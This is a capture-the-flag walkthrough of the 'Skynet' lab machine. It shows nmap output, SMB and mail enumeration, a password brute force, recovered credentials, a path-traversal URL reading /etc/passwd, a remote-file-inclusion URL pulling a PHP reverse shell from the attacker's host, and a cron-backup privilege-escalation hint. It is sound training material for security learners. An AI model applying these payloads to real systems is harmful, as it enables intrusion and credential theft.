Skynet

A vulnerable Terminator themed Linux machine.

Scanning

Nmap

root@ip-10-10-132-250:~# nmap -T4 -A 10.10.126.99
​
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 18:38 BST
Nmap scan report for ip-10-10-126-99.eu-west-1.compute.internal (10.10.126.99)
Host is up (0.00054s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (EdDSA)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE RESP-CODES CAPA UIDL TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: listed post-login ENABLE OK capabilities LITERAL+ Pre-login LOGINDISABLEDA0001 SASL-IR IDLE IMAP4rev1 have more ID LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:C1:19:41:51:45 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=9/22%OT=22%CT=1%CU=35706%PV=Y%DS=1%DC=D%G=Y%M=02C119%T
OS:M=614B6A3D%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10C%TI=Z%CI=I%TS=8
OS:)SEQ(SP=109%GCD=1%ISR=10C%TI=Z%CI=RD%II=I%TS=8)SEQ(SP=109%GCD=1%ISR=10C%
OS:TI=Z%TS=8)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301S
OS:T11NW7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%
OS:W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF
OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=
OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%
OS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=Y%DFI=N%T=40%CD=S)
​
Network Distance: 1 hop
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
Host script results:
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-09-22T12:39:04-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-22 18:39:04
|_  start_date: 1600-12-31 23:58:45
​
TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms ip-10-10-126-99.eu-west-1.compute.internal (10.10.126.99)
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.18 seconds

Enumeration

port 80

web sever

interesting /squirrelmail

port 139

smb sever

list shares

check anonymous share

username milesdyson

check attention.txt content

check logs files

Initial Access

Access miles mails

back to the directory we found before `/squirrelmail`

catch request using burpsuite

use intruder to brute force password with logs we found in SMB Server

credentials milesdyson:cyborg007haloterminator

We in

3 mails content

smb credentials milesdyson:)s{A&2Z=F^n_E.B`

Access miles SMB

i found this important note

check the directory /45kra24zxs28v3yd

brute force this directory

i found this login page

Vulnerable CMS

search exploit for this CMS Exploit-db

by triggering this url we can access Configuration.php

credentials root:password123

access /etc/passwd

http://10.10.126.99/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Reverse Shell

prepare you php reverse shell on kali exist in this directory/usr/share/webshells/php/php-reverse-shell.php

setup web server to use it with RFI remote file inclusion

fast way using python

setup listening port and trigger this url http://10.10.126.99/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.132.250:9000/rev.php

Privilege Escalation

spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

after some enumeration

this script /home/milesdyson/backups/backup.sh executed with root privilege every 1 min

what this script do

create archive from all files in /var/www/htmland save it /home/milesdyson/backups/backup.tgz

we can break this logic - GTFOBins

at /var/www/html directory and setup listener

Last updated